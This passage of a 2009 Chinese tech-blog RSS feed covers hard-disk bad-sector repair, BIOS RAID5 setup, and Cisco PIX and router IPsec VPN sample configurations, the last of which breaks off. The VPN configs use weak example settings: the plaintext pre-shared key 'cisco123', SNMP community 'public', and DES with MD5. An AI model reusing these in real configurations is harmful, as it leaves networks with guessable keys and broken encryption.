<br style="line-height: normal">
第三，电脑启动时硬盘无法引导，用软盘或光盘启动后可看见硬盘盘符但无法对该区进行操作或操作有误或干脆就看不见盘符，都表明硬盘上可能出现了坏道。具体表现如开机自检过程中，屏幕提示&ldquo;Hard disk drive failure&rdquo;&ldquo;Hard drive controller failure&rdquo;或类似信息，则可以判断为硬盘驱动器或硬盘控制器硬件故障；读写硬盘时提示&ldquo;Sector not found&rdquo;或&ldquo;General error in reading drive C&rdquo;等类似错误信息，则表明硬盘磁道出现了物理损伤。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
最后，电脑在正常运行中出现死机或&ldquo;该文件损坏&rdquo;等问题，也可能和硬盘坏道有关。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">二、硬盘坏道的维修</strong><span class="Apple-converted-space"> </span><br style="line-height: normal">
Scandisk磁盘扫描程序是解决硬盘逻辑坏道最常用的工具，而我们常见的Format命令不能对任何硬盘坏道起到修补作用，这点大家需明白。如果硬盘出现了坏道，我们可在Windows系统环境下，在&ldquo;我的电脑&rdquo;中选中要处理的硬盘盘符，选择其&ldquo;属性&rdquo;，在出现的&ldquo;工具&rdquo;按钮中选择&ldquo;查错状态&rdquo;，点击&ldquo;开始检查&rdquo;，再在&ldquo;扫描类型&rdquo;中选&ldquo;全面检查&rdquo;，并将&ldquo;自动修复错误&rdquo;打上&ldquo;勾&rdquo;，然后&ldquo;开始&rdquo;既可，它将对硬盘盘面做完全扫描处理，并且对可能出现的坏簇做自动修正。其次，在DOS状态下，硬盘有坏道，计算机在启动时一般会自动运行Scandisk进行扫描，并将坏簇以黑底红字的&ldquo;B&rdquo;（bad）标出。当然，如果系统在启动时不进行磁盘扫描或已不能进入Windows系统，我们也可用软盘或光盘启动盘启动电脑后，在相应的盘符下，如&ldquo;A：&rdquo;下运行Scandisk *：（注：*为要扫描的硬盘盘符），回车后来对相应需要扫描修复的硬盘分区进行修理。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
其它的如诺顿工具箱中的NDD&ldquo;磁盘医生&rdquo;及Pctools等相关工具对硬盘进行扫描也是修复硬盘坏道的最常用的方法，其用法很简单，许多报刊上也有介绍，大家可找来试用一下。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
如果硬盘上出现了无法修复的坏簇或物理坏道，大家可用一些磁盘软件将这些坏道单独分为一个区并隐藏起来，这样可令你的硬盘延长使用寿命。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">方法一：</strong>如一块4.3G硬盘在2G处有严重的物理坏道，用Format格式化进行不下去，Scandisk或NDD检测也通不过，但能正常分区。找来一款分区格式化软件Smart Fdisk，用启动盘启动电脑后，进入盘符A：，运行该软件的执行文件Sfdisk.EXE；然后删掉（DEL）原有分区，算出坏道在硬盘上的所在位置。如本例中，先建立1990M的基本分区，快速格式化后并激活它，然后再把坏道处分出约50M的逻辑分区，再将所剩的硬盘空间作为一个逻辑区后用快速格式化功能将其快速格式化；最后再将那个约50M的坏道所在的区删除（DEL）掉就是了。然后重启，一个有严重物理坏道的硬盘就很快被修好了，以后磁头再也不会去读那些被删除了的坏道区了。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">方法二：</strong>用Windows系统自带的Fdisk分区。例如一块1G的硬盘，在格式化到10%时不能顺利通过，这时按Ctrl+Break强行终止，运行Fdisk建立一个90M的DOS分区为C盘，然后再建立一个20M逻辑盘D，再将余下的800余M建立一个逻辑盘E。退出Fdisk再运行Format E：，如果格到10%时又遇到阻碍，这时用Fdisk再建立一个88M的E盘、10M的F盘，余下的790M作为G盘。继续重复上面的操作，直到完成。然后，运行Fdisk将10M的D、F盘删除，这时余下的就是没有坏道的好盘了。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">方法三：</strong>同理，用PartitionMagic、DiskManager等磁盘软件也可完成这样的工作。如PartitionMagic分区软件，先用PartitionMagic4中的&ldquo;check&rdquo;命令或Windows中的磁盘扫描程序来扫描磁盘，算出坏簇在硬盘上的位置，然后在Operations菜单下选择&ldquo;Advanced/bad Sector Retest&rdquo;；把坏簇所在硬盘分成多个区后，再把坏簇所在的分区隐藏，以免在Windows中误操作，这个功能是通过Hide Partition菜单项来实现的。这样也能保证有严重坏道的硬盘的正常使用，并免除系统频繁地去读写坏道从而扩展坏道的面积。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
系统显示&ldquo;TRACK 0 BAD，DISK UNUSABLE&rdquo;，意思为&ldquo;零磁道损坏，硬盘无法使用&rdquo;或用磁盘扫描程序扫描其它硬盘时其0扇区出现红色&ldquo;B&rdquo;。硬盘0扇区损坏，是大家比较头痛的故障，一般人往往将出现这样故障的硬盘作报废处理。其实合理运用一些磁盘软件，把报废的0扇区屏蔽掉，而用1扇区取而代之就能起到起死回生的效果，这样的软件如Pctools9.0和NU8等。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">方法一：</strong>我们就先以Pctools9.0为例来作说明。一块2.1G硬盘出现上述故障，用盘启动电脑后，运行Pctools9.0目录下的DE.EXE文件。接着选主菜单Select中的Drive，进去后在Drive type项选Physical，按空格选定，再按Tab键切换到Drives项，选中hard disk，然后OK回车后回到主菜单。打开Select菜单，这时会出现Partition Table，选中进入后出现硬盘分区表信息。该硬盘有两个分区，找到C区，该分区是从硬盘的0柱面开始的，那么，将1分区的Beginning Cylinder的0改成1就可以了，保存后退出。重新启动电脑后按Del键进入COMS设置，运行&ldquo;IDE AUTO DETECT&rdquo;，可以看到CYLS由782变成781。保存退出后重新分区格式化该硬盘，使其起死回生。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
<strong style="line-height: normal">方法二：</strong>诺顿NU8.0也较好用。例如一块1.28G硬盘出现0磁道损坏故障，进入NU8工具包目录，运行其主程序NORTON.EXE，然后可先选&ldquo;补救盘&rdquo;RESCUE选项对该硬盘的引导区、分区表等信息进行备份。接着选择&ldquo;磁盘编辑器DISKEDIT&rdquo;，成功运行后选&ldquo;对象OBJECT&rdquo;，选&ldquo;分区表&rdquo;后可见本硬盘的参数如下：面SIDE为0-63，簇CYLINDER为0-255，扇区SECTOR为1-63，其主引导记录和分区表信息就应该在0面0柱1扇区。我们要做的事就是把其C盘的起始扇区从0面0柱1扇区改为0面1柱1扇区，移动光标手工修改即可。另外需要说的就是，改动数值要根据具体情况而定。最后存盘后退出重启电脑，用Format命令格式化硬盘即可正常使用了。需要特别留意的是，修好后的硬盘一定不要再用DOS下的Fdisk等分区工具对其进行重新分区操作，以免其又改变硬盘的起始柱面。<span class="Apple-converted-space"> </span><br style="line-height: normal">
<br style="line-height: normal">
如果以上各招都不见效，那么就得使用主板自带的硬盘低格程序或硬盘厂家随盘赠送的低格程序如DM、Lformat等对硬盘全盘进行低级格式化处理了，它可对硬盘的一些坏道进行重新整理排除</font></span></span> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BC%BC%CA%F5%CE%C4%D5%C2">技术文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/4722e7fb507caa284e4aea2a.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-23  15:48</pubDate>
        <category><![CDATA[技术文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/4722e7fb507caa284e4aea2a.html</guid>
</item>

<item>
        <title><![CDATA[raid5组建]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/abe1ce502eaa126884352428.html]]></link>
        <description><![CDATA[
		
		<span class="Apple-style-span" style="word-spacing: 0px; font: medium Simsun; text-transform: none; color: rgb(0,0,0); text-indent: 0px; white-space: normal; letter-spacing: normal; border-collapse: separate; orphans: 2; widows: 2; webkit-border-horizontal-spacing: 0px; webkit-border-vertical-spacing: 0px; webkit-text-decorations-in-effect: none; webkit-text-size-adjust: auto; webkit-text-stroke-width: 0px"><span class="Apple-style-span" style="font-size: 14px; color: rgb(98,91,73); line-height: 20px; webkit-border-horizontal-spacing: 2px; webkit-border-vertical-spacing: 2px"><font size="3">raid模式虽多，但以我的理解其实就是把2个以上的硬盘组合在一起，一块用，以达到更快的速度和更高的安全性，大家不需要了解太多raid模式，只要知道raid0、raid1和</font><a style="font-size: 12px; color: rgb(98,91,73); line-height: normal; text-decoration: underline" target="_blank" href="http://ks.pconline.com.cn/index.jsp?q=raid5"><font style="line-height: normal" color="#000000" size="3">raid5</font></a><font size="3">就足够在服务器行业混饭了（其实什么也不知道照样混饭的人也很多），所谓raid0就是两块硬盘合成一块硬盘用，例如两个80G的硬盘，做成raid0模式，就变成一块160G的大硬盘，理论上硬盘传输速度也加倍，但是这种模式安全性很低，一旦一个硬盘坏了，两个硬盘里的所有数据都会报销，因此服务器上最好不用这种模式。 </font>
<p style="line-height: normal"><font size="3">　　所谓raid1就是两块硬盘互相做同步备份（镜像），例如两块80G的硬盘，做成raid1模式，总容量还是80G没变化，硬盘传输速度也没变化，但是两个硬盘里的数据保持同步，完全一样，一旦其中一个硬盘坏了，靠另一个硬盘，服务器依然能正常运行，这种模式很安全，所以现在很多中低端服务器采取这种raid模式，这种模式简单实用，用不高的硬件成本即可实现，我很喜欢。至于raid5，则过去一直是高档服务器的专利，即使是在今天，你翻翻许多名牌服务器的价目表，在1－2万元的产品里也很难觅到raid5的身影，采用raid5可以兼顾raid0的速度、容量和raid1的安全性，是个听起来很完美的磁盘阵列方案。</font></p>
<p style="line-height: normal"><font size="3">　　</font></p>
<p style="line-height: normal"><font size="3">　　<strong style="line-height: normal">硬件raid5组建：</strong></font></p>
<p style="line-height: normal"><font size="3"><strong style="line-height: normal">　　</strong>最近又亲手给一个朋友组装了一台采用双核心P4 820D处理器的8硬盘的1U机架式存储型服务器，在组装过程中，分别组建了硬件Raid5和软件Raid5的磁盘阵列，过程很值得玩味，现在写出详细的设置过程，以期抛砖引玉，给大家带来更多一点启发。</font></p>
<p style="line-height: normal"><font size="3">　　首先将服务器组装好，然后给硬盘插上SATA的数据线，插入主板上的四个SATA接口，用并口线连接好我的LG刻录机当光驱用，这个主板只提供了1个并口IDE接口用来接光驱正好，连上显示器、键盘、鼠标，开机测试，启动顺利，按DEL键进入bios。</font></p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2891.jpg"></p>
<p style="line-height: normal">　　在BIOS里看到，主板已经识别出四块西数250G大容量硬盘和LG刻录机。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2831.jpg"></p>
<p style="line-height: normal" align="center">硬盘和LG刻录机</p>
<p style="line-height: normal" align="center">接下来开启主板的硬件raid5模式，将这四个硬盘组成raid5磁盘阵列，富士康这款主板虽然不错，但是美中不足的是说明书竟然是英文的，如果是E文不好的朋友初次使用难免要发晕，我当初也是琢磨半天，又打了富士康公司800技术服务电话，直到把值班小姐问烦了，才搞明白大概其，下面大家就跟我来。先移动光标到integrated peripherals回车。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2832.jpg"></p>
<p style="line-height: normal">　　选择OnChip IDE Device，再回车。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2833.jpg"></p>
<p style="line-height: normal">　　选择SATA Mode，主板默认这个选项是IDE，也就是不采用raid模式，现在回车进入设置界面。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2835.jpg"></p>
<p style="line-height: normal">　　移动光标选择raid，然后回车。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2836.jpg"></p>
<p style="line-height: normal">　　启动画面显示，四个物理硬盘已经被主板raid功能识别出来，提示按CTRL-I进入raid详细设置。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2839.jpg"></p>
<p style="line-height: normal">　　进入raid详细设置界面，在MAIN MENU界面里选择第一项Create RAID Volume，新建raid卷。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2840.jpg"></p>
<p style="line-height: normal">　　现在进入CREATE VOLUME MENU界面，在第一项Name里给新卷起个名字，我这里用的是Volume0，你也可以用tanghua之类的，移动光标到第二项RAID Level，选择raid模式，这里有raid0、raid1、raid10、raid5四个选择，我们自然要选择梦寐以求的raid5。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2841.jpg"></p>
<p style="line-height: normal">　　移动光标到Disks选项，在这里回车，选择要将那些硬盘加入到这个raid卷里。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2845.jpg"><br style="line-height: normal">
我们当然要把已经连接到主板上的四个硬盘都加入进来，选择方式是按上下箭头键移动光标到想要加入的硬盘名称上，然后按空格键，这个硬盘名称的前面就会出现一个小小的三角标记，代表这个硬盘已经被加入raid5。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2846.jpg"></p>
<p style="line-height: normal">　　按回车，回到上一级设置界面，这时看到Capacity选项显示了目前4个硬盘组成的raid5磁盘阵列的总容量是698.7G，既不是raid0模式那样是四个硬盘容量之和，也不是raid1那样是四个硬盘容量之和的一半，而是大约十分之七，这时系统硬盘的传输速率理论上也获得的很大提高，今后如果有某一个硬盘坏了，数据并不会丢失，只需更换一个新的硬盘，即可重新组成raid5，服务器的对外服务不会因为数据丢失而中断，因此说，raid5模式兼顾了raid0模式的传输速度和容量大的优点，同时也具有raid1的安全性。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2851.jpg"></p>
<p style="line-height: normal">　　Strip Size选项保持默认数值即可。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2852.jpg"></p>
<p style="line-height: normal">　　最后，还要将光标停留在Create Volume选项上，按回车最终确定建立这个raid5磁盘卷。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2853.jpg"></p>
<p style="line-height: normal">　　界面回到最初的MAIN MENU，这时看到刚刚建立的raid5磁盘阵列的一些具体参数，status状态显示normal，说明该阵列一切正常，下面是已经加入raid5中的四块250G硬盘的参数。</p>
<p style="line-height: normal" align="center"><img style="line-height: normal" border="0" src="http://www.pconline.com.cn/servers/skills/0606/pic/1uraid5_2855.jpg"></p>
<p style="line-height: normal" align="left">　　这样就可以安装系统和驱动程序了。安装好系统和驱动程序之后，硬件raid5驱动安装就算完成了。接下来，再让我们看一看如何安装软raid5</p>
</span></span> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/%BC%BC%CA%F5%CE%C4%D5%C2">技术文章</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/abe1ce502eaa126884352428.html#comment">查看评论</a>]]></description>
        <pubDate>2009-11-23  15:46</pubDate>
        <category><![CDATA[技术文章]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/abe1ce502eaa126884352428.html</guid>
</item>

<item>
        <title><![CDATA[Cisco VPN配置实例]]></title>
        <link><![CDATA[http://hi.baidu.com/panhc007/blog/item/da4c844379f76a1972f05dc4.html]]></link>
        <description><![CDATA[
		
		<div style="font-size: 10pt">
<div><font size="3">　</font></div>
<div>
<p><font size="3"><font face="宋体,verdana, arial, helvetica">一、Pix-Pix<br>
　　二、路由器和路由器之间的VPN配置<br>
　　三、路由器-路由器以及VPN Client之间的VPN</font> <br>
<br>
<font face="宋体,verdana, arial, helvetica">一、Pix-Pix</font></font></p>
<p><font size="3"><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/de663981b8530ff7bd3e1e05.jpg"><br>
</span><br>
</font><font size="3"><font face="宋体,verdana, arial, helvetica">PIX Central<br>
<br>
Building configuration...<br>
: Saved<br>
:<br>
PIX Version 6.3(3)<br>
interface ethernet0 auto<br>
interface ethernet1 auto<br>
nameif ethernet0 outside security0<br>
nameif ethernet1 inside security100<br>
enable password 8Ry2YjIyt7RRXU24 encrypted<br>
passwd 2KFQnbNIdI.2KYOU encrypted<br>
hostname pix-central<br>
fixup protocol dns maximum-length 512<br>
fixup protocol ftp 21<br>
fixup protocol h323 h225 1720<br>
fixup protocol h323 ras 1718-1719<br>
fixup protocol http 80<br>
fixup protocol rsh 514<br>
fixup protocol rtsp 554<br>
fixup protocol sip 5060<br>
fixup protocol sip udp 5060<br>
fixup protocol skinny 2000<br>
fixup protocol smtp 25<br>
fixup protocol sqlnet 1521<br>
fixup protocol tftp 69<br>
names <br>
<br>
!--- This is traffic to PIX 2.<br>
<br>
access-list 120 permit ip 10.1.1.0 255.255.255.0 10.2.2.0 255.255.255.0 <br>
<br>
!--- This is traffic to PIX 3.<br>
<br>
access-list 130 permit ip 10.1.1.0 255.255.255.0 10.3.3.0 255.255.255.0 <br>
<br>
!--- Do not do Network Address Translation (NAT) on traffic to other PIXes.<br>
<br>
access-list 100 permit ip 10.1.1.0 255.255.255.0 10.2.2.0 255.255.255.0 <br>
access-list 100 permit ip 10.1.1.0 255.255.255.0 10.3.3.0 255.255.255.0 <br>
pager lines 24<br>
logging on<br>
mtu outside 1500<br>
mtu inside 1500<br>
ip address outside 172.18.124.153 255.255.255.0<br>
ip address inside 10.1.1.1 255.255.255.0<br>
ip audit info action alarm<br>
ip audit attack action alarm<br>
pdm history enable<br>
arp timeout 14400<br>
<br>
!--- Do not do NAT on traffic to other PIXes.<br>
<br>
nat (inside) 0 access-list 100<br>
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1<br>
timeout xlate 3:00:00<br>
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00<br>
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00<br>
timeout uauth 0:05:00 absolute<br>
aaa-server TACACS+ protocol tacacs+ <br>
aaa-server RADIUS protocol radius <br>
aaa-server LOCAL protocol local <br>
no snmp-server location<br>
no snmp-server contact<br>
snmp-server community public<br>
snmp-server enable traps<br>
floodguard enable<br>
sysopt connection permit-ipsec<br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
<br>
!--- This is traffic to PIX 2.<br>
<br>
crypto map newmap 20 ipsec-isakmp<br>
crypto map newmap 20 match address 120<br>
crypto map newmap 20 set peer 172.18.124.154<br>
crypto map newmap 20 set transform-set myset<br>
<br>
!--- This is traffic to PIX 3.<br>
<br>
crypto map newmap 30 ipsec-isakmp<br>
crypto map newmap 30 match address 130<br>
crypto map newmap 30 set peer 172.18.124.157<br>
crypto map newmap 30 set transform-set myset<br>
crypto map newmap interface outside<br>
isakmp enable outside<br>
isakmp key ******** address 172.18.124.154 netmask 255.255.255.255 <br>
no-xauth no-config-mode <br>
isakmp key ******** address 172.18.124.157 netmask 255.255.255.255 <br>
no-xauth no-config-mode <br>
isakmp identity address<br>
isakmp policy 10 authentication pre-share<br>
isakmp policy 10 encryption des<br>
isakmp policy 10 hash md5<br>
isakmp policy 10 group 1<br>
isakmp policy 10 lifetime 1000<br>
telnet timeout 5<br>
ssh timeout 5<br>
console timeout 0<br>
terminal width 80<br>
Cryptochecksum:d41d8cd98f00b204e9800998ecf8427e<br>
: end<br>
<br>
<br>
PIX 2<br>
<br>
Building configuration...<br>
: Saved<br>
:<br>
PIX Version 6.3(3)<br>
interface ethernet0 auto<br>
interface ethernet1 auto<br>
nameif ethernet0 outside security0<br>
nameif ethernet1 inside security100<br>
enable password 8Ry2YjIyt7RRXU24 encrypted<br>
passwd 2KFQnbNIdI.2KYOU encrypted<br>
hostname pix2<br>
fixup protocol dns maximum-length 512<br>
fixup protocol ftp 21<br>
fixup protocol h323 h225 1720<br>
fixup protocol h323 ras 1718-1719<br>
fixup protocol http 80<br>
fixup protocol rsh 514<br>
fixup protocol rtsp 554<br>
fixup protocol sip 5060<br>
fixup protocol sip udp 5060<br>
fixup protocol skinny 2000<br>
fixup protocol smtp 25<br>
fixup protocol sqlnet 1521<br>
fixup protocol tftp 69<br>
names <br>
<br>
!--- This is traffic to PIX Central.<br>
<br>
access-list 110 permit ip 10.2.2.0 255.255.255.0 10.1.1.0 255.255.255.0 <br>
<br>
!--- Do not do NAT on traffic to PIX Central.<br>
<br>
access-list 100 permit ip 10.2.2.0 255.255.255.0 10.1.1.0 255.255.255.0 <br>
pager lines 24<br>
logging on<br>
mtu outside 1500<br>
mtu inside 1500<br>
ip address outside 172.18.124.154 255.255.255.0<br>
ip address inside 10.2.2.1 255.255.255.0<br>
ip audit info action alarm<br>
ip audit attack action alarm<br>
no failover<br>
failover timeout 0:00:00<br>
failover poll 15<br>
no failover ip address outside<br>
no failover ip address inside<br>
pdm history enable<br>
arp timeout 14400<br>
<br>
!--- Do not do NAT on traffic to PIX Central.<br>
<br>
nat (inside) 0 access-list 100<br>
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1<br>
timeout xlate 3:00:00<br>
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00<br>
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00<br>
timeout uauth 0:05:00 absolute<br>
aaa-server TACACS+ protocol tacacs+ <br>
aaa-server RADIUS protocol radius <br>
aaa-server LOCAL protocol local <br>
no snmp-server location<br>
no snmp-server contact<br>
snmp-server community public<br>
no snmp-server enable traps<br>
floodguard enable<br>
sysopt connection permit-ipsec<br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
<br>
!--- This is traffic to PIX Central.<br>
<br>
crypto map newmap 10 ipsec-isakmp<br>
crypto map newmap 10 match address 110<br>
crypto map newmap 10 set peer 172.18.124.153<br>
crypto map newmap 10 set transform-set myset<br>
crypto map newmap interface outside<br>
isakmp enable outside<br>
isakmp key ******** address 172.18.124.153 netmask 255.255.255.255 <br>
no-xauth no-config-mode <br>
isakmp identity address<br>
isakmp policy 10 authentication pre-share<br>
isakmp policy 10 encryption des<br>
isakmp policy 10 hash md5<br>
isakmp policy 10 group 1<br>
isakmp policy 10 lifetime 1000<br>
telnet timeout 5<br>
ssh timeout 5 <br>
console timeout 0<br>
terminal width 80<br>
Cryptochecksum:d41d8cd98f00b204e9800998ecf8427e<br>
: end<br>
<br>
<br>
<br>
PIX 3 Configuration<br>
<br>
Building configuration...<br>
: Saved<br>
:<br>
PIX Version 6.3(3)<br>
interface ethernet0 auto<br>
interface ethernet1 auto<br>
nameif ethernet0 outside security0<br>
nameif ethernet1 inside security100<br>
enable password 8Ry2YjIyt7RRXU24 encrypted<br>
passwd 2KFQnbNIdI.2KYOU encrypted<br>
hostname pix3<br>
fixup protocol dns maximum-length 512<br>
fixup protocol ftp 21<br>
fixup protocol h323 h225 1720<br>
fixup protocol h323 ras 1718-1719<br>
fixup protocol http 80<br>
fixup protocol rsh 514<br>
fixup protocol rtsp 554<br>
fixup protocol sip 5060<br>
fixup protocol sip udp 5060<br>
fixup protocol skinny 2000<br>
fixup protocol smtp 25<br>
fixup protocol sqlnet 1521<br>
fixup protocol tftp 69<br>
names <br>
<br>
!--- This is traffic to PIX Central.<br>
<br>
access-list 110 permit ip 10.3.3.0 255.255.255.0 10.1.1.0 255.255.255.0 <br>
<br>
!--- Do not do NAT on traffic to PIX Central.<br>
<br>
access-list 100 permit ip 10.3.3.0 255.255.255.0 10.1.1.0 255.255.255.0 <br>
pager lines 24<br>
logging on<br>
mtu outside 1500<br>
mtu inside 1500<br>
ip address outside 172.18.124.157 255.255.255.0<br>
ip address inside 10.3.3.1 255.255.255.0<br>
ip audit info action alarm<br>
ip audit attack action alarm<br>
no failover<br>
failover timeout 0:00:00<br>
failover poll 15<br>
no failover ip address outside<br>
no failover ip address inside<br>
pdm history enable<br>
arp timeout 14400<br>
<br>
!--- Do not do NAT on traffic to PIX Central.<br>
<br>
nat (inside) 0 access-list 100<br>
route outside 0.0.0.0 0.0.0.0 172.18.124.1 1<br>
timeout xlate 3:00:00<br>
timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 rpc 0:10:00 h225 1:00:00<br>
timeout h323 0:05:00 mgcp 0:05:00 sip 0:30:00 sip_media 0:02:00<br>
timeout uauth 0:05:00 absolute<br>
aaa-server TACACS+ protocol tacacs+ <br>
aaa-server RADIUS protocol radius <br>
aaa-server LOCAL protocol local <br>
no snmp-server location<br>
no snmp-server contact<br>
snmp-server community public<br>
no snmp-server enable traps<br>
floodguard enable<br>
sysopt connection permit-ipsec<br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
<br>
!--- This is traffic to PIX Central.<br>
<br>
crypto map newmap 10 ipsec-isakmp<br>
crypto map newmap 10 match address 110<br>
crypto map newmap 10 set peer 172.18.124.153<br>
crypto map newmap 10 set transform-set myset<br>
crypto map newmap interface outside<br>
isakmp enable outside<br>
isakmp key ******** address 172.18.124.153 netmask 255.255.255.255 <br>
no-xauth no-config-mode <br>
isakmp identity address<br>
isakmp policy 10 authentication pre-share<br>
isakmp policy 10 encryption des<br>
isakmp policy 10 hash md5<br>
isakmp policy 10 group 1<br>
isakmp policy 10 lifetime 1000<br>
telnet timeout 5<br>
ssh timeout 5 <br>
console timeout 0<br>
terminal width 80<br>
Cryptochecksum:aa3bbd8c6275d214b153e1e0bc0173e4<br>
: end</font> <br>
<br>
<br>
<br>
</font><font size="3"><font face="宋体,verdana, arial, helvetica">二、路由器和路由器之间的VPN配置<br>
<br>
</font><span><img class="blogimg" border="0" small="0" src="http://hiphotos.baidu.com/panhc007/pic/item/3caaded42c47912ea08bb700.jpg"><br>
</span><br>
Hub Router<br>
<br>
2503#show running-config<br>
Building configuration...<br>
Current configuration : 1466 bytes<br>
!<br>
version 12.2<br>
<br>
service timestamps debug datetime msec<br>
service timestamps log uptime<br>
no service password-encryption<br>
!<br>
hostname 2503<br>
!<br>
<br>
<br>
!<br>
ip subnet-zero<br>
!<br>
<br>
!<br>
<br>
!--- Configuration for IKE policies.<br>
<br>
crypto isakmp policy 10<br>
<br>
!--- Enables the IKE policy configuration (config-isakmp) <br>
!--- command mode, where you can specify the parameters that <br>
!--- are used during an IKE negotiation.<br>
<br>
hash md5<br>
authentication pre-share<br>
crypto isakmp key cisco123 address 200.1.2.1<br>
crypto isakmp key cisco123 address 200.1.3.1<br>
<br>
!--- Specifies the preshared key &quot;cisco123&quot; which should <br>
!--- be identical at both peers. This is a global <br>
!--- configuration mode command.<br>
<br>
<br>
!<br>
<br>
!--- Configuration for IPSec policies.<br>
<br>
crypto ipsec transform-set myset esp-des esp-md5-hmac <br>
<br>
!--- Enables the crypto transform configuration mode, <br>
!--- where you can specify the transform sets that are used <br>
!--- during an IPSec negotiation. <br>
<br>
!<br>
crypto map mymap 10 ipsec-isakmp <br>
<br>
!--- Indicates that IKE is used to establish <br>
!--- the IPSec security association for protecting the <br>
!--- traffic specified by this crypto map entry.<br>
<br>
set peer 200.1.2.1<br>
<br>
!--- Sets the IP address of the remote end.<br>
<br>
set transform-set myset <br>
<br>
!--- Configures IPSec to use the transform-set <br>
!--- &quot;myset&quot; defined earlier in this configuration.<br>
<br>
match address 110<br>
<br>
!--- Specifyies the traffic to be encrypted.<br>
<br>
crypto map mymap 20 ipsec-isakmp <br>
set peer 200.1.3.1<br>
set transform-set myset <br>
match address 120<br>
!<br>
!<br>
!<br>
!<br>
interface Loopback0<br>
ip address 10.1.1.1 255.255.255.0<br>
!<br>
interface Ethernet0<br>
ip address 200.1.1.1 255.255.255.0<br>
no ip route-cache<br>
<br>
!--- You must enable process switching for IPSec <br>
!--- to encrypt outgoing packets. This command disables fast switching.<br>
<br>
no ip mroute-cache<br>
crypto map mymap<br>
<br>
!--- Configures the interface to use the <br>
!--- crypto map &quot;mymap&quot; for IPSec.<br>
<br>
!<br>
<br>
<br>
!--- Output suppressed.<br>
<br>
ip classless<br>
ip route 172.16.1.0 255.255.255.0 Ethernet0<br>
ip route 192.168.1.0 255.255.255.0 Ethernet0<br>
ip route 200.1.0.0 255.255.0.0 Ethernet0<br>
ip http server<br>
<br>
!<br>
access-list 110 permit ip 10.1.1.0 0.0.0.255 172.16.1.0 0.0.0.255<br>
access-list 110 permit ip 192.168.1.0 0.0.0.255 172.16.1.0 0.0.0.255<br>
access-list 120 permit ip 10.1.1.0 0.0.0.255 192.168.1.0 0.0.0.255<br>
access-list 120 permit ip 172.16.1.0 0.0.0.255 192.168.1.0 0.0.0.255<br>
<br>
!--- This crypto ACL-permit identifies the <br>
!--- matching traffic flows to be protected via encryption.<br>
<br>
<br>
<br>
<br>
Spoke 1 Router<br>
<br>
2509a#show running-config<br>
Building configuration...<br>
Current configuration : 1203 bytes<br>
!<br>
version 12.2<br>
<br>
service timestamps debug datetime msec<br>
service timestamps log uptime<br>
no service password-encryption<br>
!<br>
hostname 2509a<br>
!<br>
